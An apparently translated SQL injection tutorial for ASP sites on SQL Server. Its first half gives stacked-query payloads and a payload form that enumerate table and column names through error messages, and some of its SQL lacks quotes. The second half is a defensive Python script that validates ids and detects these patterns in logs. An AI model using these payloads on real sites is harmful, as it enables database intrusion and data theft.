The whole-site article system uses FSO to generate static HTML files for display. This reduces server load and speeds up access; the second purpose is to prevent SQL injection attacks...
System principle:
All articles have a copy in the database. In addition, an HTML page is generated based on the template.
Attack method: check whether the static page still calls a server-side script through JS.
For example, the page calls <script language="javascript" src="count.asp?id=1552"></script> to update the article's view count.
We can then test whether injection is possible:
http://<server domain name>/count.asp?id=1552
and check whether an error occurs. If it does, the injection vulnerability exists and the usual attacks can be carried out.
Create a post.htm file and a log.txt text file on the local machine (for keeping records).
Post.htm content (convenient for entering the payloads):
Copy the following code to the clipboard:
<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=http://test.com/count.asp target=p>
<input name="id" value="1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = u and status > 0 );--" style="width: 750">
<input type=submit value=">">
<input type=hidden name=fno value="2, 3">
</form>
To determine whether the back end is SQL Server: add a semicolon after 1552. If the page still behaves normally, it is SQL Server, and on such a database a table can be created: id=1552; create table aaa (aaa char(20));--
Insert a record: id=1552; insert into aaa values (test);--
Next, extract its table names:
id=1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = u and status > 0);--
This writes the first table name into the aaa field.
Then request id=1552 and exists (select * from aaa where aaa > 5). An error is reported, and in most cases it reveals the table name directly: Microsoft OLE DB Provider for SQL Server error '80040e07': a syntax error occurred converting the varchar value 'vote' to a column of data type int.
/Search.asp, line 21
Here, vote is the table name.
Alternatively, guess a table name and update one record of that table to the value of (select top 1 name from sysobjects where xtype = u and status > 0), so that the name is displayed on the web page.
That reads the first table; the second table can be read the same way (append and name <> <the table name just obtained> to the condition):
id=1552; update aaa set aaa = (select top 1 name from sysobjects where xtype = u and status > 0 and name <> vote);--
Then id=1552 and exists (select * from aaa where aaa > 5) reads out the second table; repeat this one table at a time until none remain.
Reading fields:
id=1552; update aaa set aaa = (select top 1 col_name(object_id(table name), 1));--
Then id=1552 and exists (select * from aaa where aaa > 5) raises the error that reveals the first field name. Next, id=1552; update aaa set aaa = (select top 1 col_name(object_id(table name), 2));-- followed by id=1552 and exists (select * from aaa where aaa > 5) raises the error that reveals the second field name.
... and so on.
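As an added example (not from the original article or its author), here is a Python script with two defender-side checks against the technique walked through above: the strict integer validation that a counter script like count.asp should apply to its id parameter before it reaches any SQL statement, and a detector that scans IIS W3C log lines for the stacked-query, sysobjects and col_name(object_id(...)) patterns used in the walkthrough. The log lines and the #Fields layout are constructed for this example; the /count.asp path and the id parameter come from the article.

```python
import re
from urllib.parse import parse_qs

# Constructed sample IIS W3C log excerpt (not real traffic). The #Fields
# layout is assumed; real servers usually log additional columns.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time cs-uri-stem cs-uri-query sc-status
2004-05-01 10:15:02 /count.asp id=1552 200
2004-05-01 10:15:09 /count.asp id=1552%3B 200
2004-05-01 10:15:31 /count.asp id=1552%3B+create+table+aaa+(aaa+char(20))%3B-- 200
2004-05-01 10:16:04 /count.asp id=1552%3B+update+aaa+set+aaa%3D(select+top+1+name+from+sysobjects+where+xtype%3Du+and+status%3E0)%3B-- 200
2004-05-01 10:16:20 /count.asp id=1552+and+exists+(select+*+from+aaa+where+aaa%3E5) 500
2004-05-01 10:17:00 /count.asp id=1552%3B+update+aaa+set+aaa%3D(select+top+1+col_name(object_id(vote)%2C1))%3B-- 200
2004-05-01 10:18:00 /article.asp id=77 200
"""

# Whitelist for the article id: a short run of digits and nothing else.
_ID_RE = re.compile(r"[0-9]{1,9}")


def validate_article_id(raw):
    """The check count.asp should apply: return the id as an int, or None
    when the value is anything other than a plain positive integer.
    '1552;' (the SQL Server probe) and every stacked query fail here."""
    s = raw.strip()
    if _ID_RE.fullmatch(s) is None:
        return None
    return int(s)


# Signatures of the steps described in the article, matched against the
# URL-decoded parameter value after whitespace normalisation.
_SIGNATURES = {
    "stacked_query": re.compile(r";\s*(update|insert|create|drop|exec)\b", re.I),
    "sysobjects_enum": re.compile(r"\bsysobjects\b", re.I),
    "column_enum": re.compile(r"\bcol_name\s*\(\s*object_id\s*\(", re.I),
    "boolean_probe": re.compile(r"\band\s+exists\s*\(\s*select\b", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}


def classify_query_value(value):
    """Sorted names of the signatures present in one decoded parameter value."""
    norm = re.sub(r"\s+", " ", value).strip()
    return sorted(name for name, rx in _SIGNATURES.items() if rx.search(norm))


def parse_w3c_log(text):
    """Yield one dict per data line of a W3C extended log, keyed by the
    column names from the most recent #Fields directive."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip() or fields is None:
            continue
        parts = raw.split()
        if len(parts) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def scan_log(text, id_param="id"):
    """Return findings for every request whose id parameter fails the
    integer whitelist, each with the signatures matched in that value."""
    findings = []
    for row in parse_w3c_log(text):
        params = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        for value in params.get(id_param, []):
            if validate_article_id(value) is not None:
                continue
            findings.append({
                "time": row["date"] + " " + row["time"],
                "stem": row["cs-uri-stem"],
                "status": row["sc-status"],
                "value": value,
                "signatures": classify_query_value(value),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["stem"], f["status"], f["signatures"], repr(f["value"]))
```

Note that the whitelist flags the bare "1552;" probe even though no SQL keyword appears in it, which is the point: rejecting the request on type alone closes the path before any signature matching is needed. The signature list is only a triage aid for historical logs; the durable fix is a numeric check like validate_article_id plus a parameterised query in count.asp, and the 500 status on the boolean probe shows why database error messages should not be returned to the browser.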